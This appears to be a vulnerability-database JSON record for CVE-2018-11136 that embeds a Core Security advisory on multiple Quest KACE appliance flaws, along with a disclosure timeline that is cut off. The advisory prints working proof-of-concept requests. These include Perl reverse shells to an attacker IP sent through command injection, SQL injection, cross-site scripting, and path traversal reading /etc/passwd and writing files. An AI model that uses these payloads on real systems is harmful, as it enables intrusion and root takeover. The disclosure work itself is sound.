CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0596",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 1.6,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11136"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11136",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11136",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11136",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11136",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1218",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11136",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11136"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005458"
},
{
"db": "NVD",
"id": "CVE-2018-11136"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1218"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, a blind time-based type). Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. This behavior\ncan be abused to execute arbitrary commands on the system. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 